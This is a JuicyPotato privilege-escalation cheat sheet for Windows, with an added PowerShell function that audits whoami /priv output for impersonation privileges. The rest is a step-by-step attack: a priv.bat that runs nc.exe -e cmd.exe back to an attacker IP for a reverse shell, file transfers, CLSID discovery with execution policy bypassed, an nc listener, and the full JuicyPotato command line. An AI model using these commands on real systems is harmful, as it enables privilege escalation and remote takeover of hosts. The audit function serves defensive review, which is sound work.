JuicyPotato
- Check whether SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege is enabled with whoami /priv or whoami /all
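An added example (not part of the original cheat-sheet) for the check above from the auditing side: a PowerShell function that parses whoami /priv output and reports whether the token holds either of the two privileges JuicyPotato depends on, so it can be run across service-account contexts during a hardening review. The function name and the sample output are constructed for this example.

```powershell
# Added example: parse `whoami /priv` output and report whether the token holds
# SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege (the JuicyPotato prerequisites).
function Get-ImpersonationPrivilegeState {
    param(
        # Output of `whoami /priv`, one line per element; defaults to running it live.
        [string[]]$WhoamiOutput = (whoami /priv)
    )
    $watch = 'SeImpersonatePrivilege', 'SeAssignPrimaryTokenPrivilege'
    $parsed = foreach ($line in $WhoamiOutput) {
        # Data rows look like:
        # "SeImpersonatePrivilege   Impersonate a client after authentication   Enabled"
        if ($line -match '^(Se\w+Privilege)\s+(.*?)\s+(Enabled|Disabled)\s*$') {
            [pscustomobject]@{
                Privilege   = $Matches[1]
                Description = $Matches[2]
                State       = $Matches[3]
            }
        }
    }
    $hits = @($parsed | Where-Object { $watch -contains $_.Privilege })
    [pscustomobject]@{
        Privileges = $hits
        # Any of the watched privileges present in the token marks the account as exposed
        # to token-impersonation privilege escalation.
        AtRisk     = ($hits.Count -gt 0)
    }
}

# Constructed sample output (not captured from a real host) so the function runs offline.
$sample = @'
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
'@ -split "`r?`n"

# Expected: AtRisk = True, with SeImpersonatePrivilege listed under Privileges.
Get-ImpersonationPrivilegeState -WhoamiOutput $sample | Format-List
```

Run it without -WhoamiOutput inside a service's context (for example from a scheduled task or service configured under the account being reviewed) to see what that account's token actually carries.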
Requirement
- Potato exe https://github.com/ohpe/juicy-potato/releases
Note: there are other binaries besides JuicyPotato (RottenPotato, SweetPotato, etc.) that can be used under certain circumstances; see https://jlajara.gitlab.io/Potatoes_Windows_Privesc
- Create priv.bat for the reverse privileged shell:
echo "C:\Windows\Tasks\nc.exe -e cmd.exe <attacker ip> <port>" > priv.bat
- Transfer nc.exe (from /usr/share/windows-resources/binaries/nc.exe)
- Script GetCLSID.ps1 for finding the CLSID: https://ohpe.it/juicy-potato/CLSID/
powershell -executionpolicy bypass -file GetCLSID.ps1 > cls.txt
Sometimes the CLSID is not required.
Transfer all files to the Windows host.
Exploit
- Start the listener on the attacker machine first:
nc -nvlp 4444
- Run JuicyPotato on the Windows host:
.\JuicyPotato.exe -p "C:\Windows\Tasks\priv.bat" -l 4444 -t * -c {653C5148-4DCE-4905-9CFD-1B23662D3D9E}
-l is the listening port (the same one used in priv.bat), -c is the CLSID